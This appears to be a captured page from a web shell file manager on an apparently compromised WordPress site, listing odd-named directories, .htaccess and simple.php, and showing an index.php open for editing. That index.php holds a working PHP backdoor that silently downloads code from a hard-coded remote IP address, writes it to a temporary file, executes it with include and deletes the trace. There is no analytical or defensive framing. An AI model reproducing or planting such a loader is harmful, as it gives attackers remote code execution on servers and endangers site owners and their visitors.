at path:
ROOT
/
index.php
run:
R
W
Run
0af164
DIR
2026-06-17 06:26:23
R
W
Run
4aea1
DIR
2026-06-28 02:04:23
R
W
Run
a6b7c
DIR
2026-06-17 06:26:30
R
W
Run
wp-includes
DIR
2026-06-17 06:26:23
R
W
Run
.htaccess
233 By
2026-07-24 02:29:14
R
W
Run
Delete
Rename
index.php
421 By
2026-07-24 02:57:05
R
W
Run
Delete
Rename
simple.php
15.05 KB
2026-07-24 02:29:14
R
W
Run
Delete
Rename
error_log
up
📄
index.php
Save
<?php $f = @tempnam(@sys_get_temp_dir(),""); $handle = curl_init(); curl_setopt ($handle, CURLOPT_URL, 'http://192.187.108.202/z60722_8/stat/index.txt'); curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5); $result = curl_exec( $handle ); if ( PHP_VERSION_ID < 80000 ) { curl_close( $handle ); } @file_put_contents($f, $result); @include $f; @unlink($f);